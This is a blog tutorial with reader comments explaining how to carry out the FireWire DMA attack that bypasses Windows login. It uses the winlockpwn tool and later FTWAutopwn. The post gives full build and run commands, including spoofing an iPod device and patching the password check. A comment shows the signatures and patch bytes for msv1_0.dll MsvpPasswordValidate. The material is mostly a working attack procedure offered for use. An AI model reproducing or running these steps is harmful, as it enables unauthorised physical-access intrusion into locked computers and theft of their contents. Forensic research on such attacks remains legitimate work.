Update: I’ve released a tool at github called Inception, which uses libforensic1394 to unlock Windows XP, Vista and Windows 7 boxes. IMNSHO, it is much more stable than winlockpwn, easier to use and works against a wider spectrum of target operating systems.
Quite regularly I’m being asked to demonstrate the FireWire attack made by MetlStorm aka Adam Boileau (http://www.storm.net.nz/projects/16 [site down as of May 20]) where an attacker unlocks a Windows machine by writing to the victim machine’s memory via FireWire. It’s kind of a party trick hack, but it never stops to amaze people. A couple of days ago I demonstrated the trick at AFSecurity, and I was asked if it was easy to find a good description on how to do it.
Well, sort of. There’s an excellent guide here, but several of the commands does not work out of the box on Ubuntu anymore, so I’ve created this little tutorial. All hail to Tim for creating the original. Also, the original source of the tool have disappeared from the net, so I’ve started hosting my own version of the tool right here. Metlstorm, if you read this, apologies in advance. Let me buy you a beer sometime! Or get your site up again :-)
So here’s how to do the hack on Ubuntu 11.04 (Natty Narwhal) Ubuntu 10.10 (Maverick Meerkat):
(Update: According to this thread, the raw1394 device is no longer supported as of Ubuntu 11.04, I’ll try to figure out how to use the tool with the new FireWire stack (JuJu)).
Get the dependencies
First, get the stuff we need to be able to compile the winlockpwn tool and necessary FireWire driver:
sudo apt-get install build-essential linux-headers-$(uname -r) libdc1394-22 libraw1394-dev swig
Secondly, we need to download and compile Python 2.3:
wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz tar xvfz Python-2.3.6.tgz cd Python-2.3.6 ./configure
Now, since this old python version has several potential buffer overflow vulnerabilities, we have to tell gcc to quietly ignore them by editing the Makefile. Open the makefile in your favourite text editor, and change the following lines:
BASECFLAGS= -fno-strict-aliasing
To:
BASECFLAGS= -fno-strict-aliasing -fno-stack-protector -U_FORTIFY_SOURCE
Then compile and make an alternative install (that will make the new (old) python libraries co-reside nicely with your existing python libraries):
make sudo make altinstall
Fix up the libraw1394:
sudo vim /usr/include/libraw1394/raw1394.h
Search for and comment out all references to the ‘__attribute__ ((deprecated));’ and be sure to put an ending semicolon on the previous line.
Download and install winlockpwn
Since Adam Bolieu’s site is down, I’ve taken the liberty of hosting the tool files here. I’ve also added some more csr’s and signatures for Windows XP SP3, Vista 32 and 64-bit, Ubuntu 9.04 and Windows 7 32 and 64-bit. Woohoo!
wget http://www.breaknenter.org/files/winlockpwn/pythonraw1394-1.0.tar.gz tar xvfz pythonraw1394-1.0.tar.gz cd pythonraw1394 wget http://www.breaknenter.org/files/winlockpwn/winlockpwn chmod +x ./winlockpwn vim Makefile (reference /usr/local/bin/python2.3 instead of /usr for python) make
Unload the default Ubuntu FireWire drivers and load your own:
sudo modprobe -r firewire_ohci sudo modprobe -r firewire_core sudo modprobe ohci1394 sudo modprobe raw1394
Give write permissions to the firewire device:
sudo chmod 666 /dev/raw1394
Edit the first line of the files romtool, businfo and winlockpwn to reference the python 2.3 location as installed above, then load the ipod image (or any of the other csr’s) to the firewire port:
sudo ./romtool -s 0 ipod.csr
Run businfo to check the port configurations:
sudo ./businfo
Check the node list. Node 0 is the Windows machine, node 1 should be the fake iPod. Connect to the Windows machine using a firewire cable, and watch as Windows loads the firewire drivers, recognizes the iPod and gives it DMS. At last, run winlockpwn (example parameters below):
sudo ./winlockpwn 0 0 2
You can get a quick explanation of the winlockpwn parameters by running the command without parameters. If you’re having trouble getting DMA access, try some of the other ROM csr’s. Also, verify that no other firewire drivers (than the ones loaded above) are present by issuing the following commands:
lsmod | grep 1394 lsmod | grep firewire
nino
Hi Carsten
Ive just updated to 11.04 and im having issues getting the raw1394 module to load:
sudo modprobe raw1394
FATAL: Module raw1394 not found.
raw1394 is deffinetly installed:
sudo apt-get install libraw1394-dev
Reading package lists… Done
Building dependency tree
Reading state information… Done
libraw1394-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 174 not upgraded.
Id appreciate if you could give me some pointers!
Carsten
Did you issue the modprobe command from the directory where you compiled winlockpwn? You should have a ‘raw1394.ko’ kernel module there if I’m not mistaken, but I’ll check when I have access to my Ubuntu box.
nino
Hi Carsten
I only have:
raw1394.i
raw1394.pyc
raw1394_wrap.c
There isnt a raw1394.ko anywhere on the system, apparently the support has been removed from the later kernels.
Im giving a demo tomorrow so i might need to format and go back down to 9.10 :(
Carsten
Haven’t tried the tool on the newest ubuntu release yet (there was a typo in the guide stating that it was for Natty, while I’ve only tested this on Ubuntu 10.10 (Maverick Meerkat)), so unfortunately I’m unable to help you. But I’ll check today if I can make it work on Natty as well.
I’m currently developing my own tool that is much more stable, although it’s unfinished. It’s available at github in a pre-alpha release: https://github.com/carmaa/FTWAutopwn
It only includes signatures for Win7 at the moment, but you can copy other signatures from the winlockpwn tool.
It requires python3.2 and libforensic1394, check the readme file.
Vishal
Hello Carsten,
I am working on my research project on the Forensic Firewire topic but when I run the following command as:
sudo modprobe ohci1394
sudo modprobe raw1394
It gives me error as “Module raw1394 not found”.
Can you please help me out whats my mistake.
Thanks..
Carsten
Check out my tool FTWAutopwn instead
Vishal
Hello Carsten,
As per your suggestion I used the “ftwautopwn” tools and the procedure suggested by you, but after the complete attack I get an output as “Attack Unsuccessful” as no signature was found. I tried this on Mac Book Pro (Snow Leopard 10.6.8) and even on Windows 7 SP1 Home Edition.
Can you please help me for the same. Because I am stuck on the same. Actually my main task is to capture the RAM memory (volatile memory) but I am unsuccessful. Can you please help me I will be very thankful to you.
Please reply ASAP.
Thanks
Leidy
That inisght\’s perfect for what I need. Thanks!
Carsten
Tried winlockpwn on Natty last night, didn’t pan out. Seems like the new FW stack doesn’t include raw1394 anymore. Let me do some digging to see if it’s possible to fetch the old stack from somewhere and load it.
firedart
I’m having trouble getting FTWautopwn to work on BackTrack 5. Could you possibly provide step-by-step instructions for getting it working from a fresh install of Backtrack5 please? Including how to install Python 3.2.1 and libforensic1394 to the right place, where to put ftwautopwn.py, what other files I need from your github page etc. My linux skills are poor!
Carsten
Will do! I’m currently moving to the US so that’s why it’s been quiet here on the blog for a while. In a couple of weeks I’ll post a newer version of the tool including a tutorial.
Carsten
This guide should work for BT5 also, please let me know if it doesn’t.
jan
I am having trouble getting this to work. The SBP2 device shows up in the device manager of the target machine, as well as a disk drive (UNKNOWN VENDOR AND MODEL) with a yellow question mark on it. It says ‘cannot start’. the error I get is:
Please select target (or enter ‘q’ to quit): 6
[+] You have selected: Windows XP SP3 (x86) msv1_0.dll MsvpPasswordValidate technique
Phase 1:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0x8aa (2218)
Phase 2:
Using signature: 0x83f8107511b0018b
Using patch: 0x83f8109090b0018b
Using offset: 0×862 (2146)
Traceback (most recent call last):SBP2, please wait 1 seconds or press Ctrl+C
File “./ftwautopwn.py”, line 80, in
main(sys.argv[1:])
File “./ftwautopwn.py”, line 76, in main
unlock.run(ctx)
File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 129, in run
d = initialize_fw(d)
File “/home/jan/FTWAutopwn/ftwautopwn/unlock.py”, line 254, in initialize_fw
d = b.devices()[0]
IndexError: list index out of range
any ideas?
jan
ignore my post. wrong forum. sorry.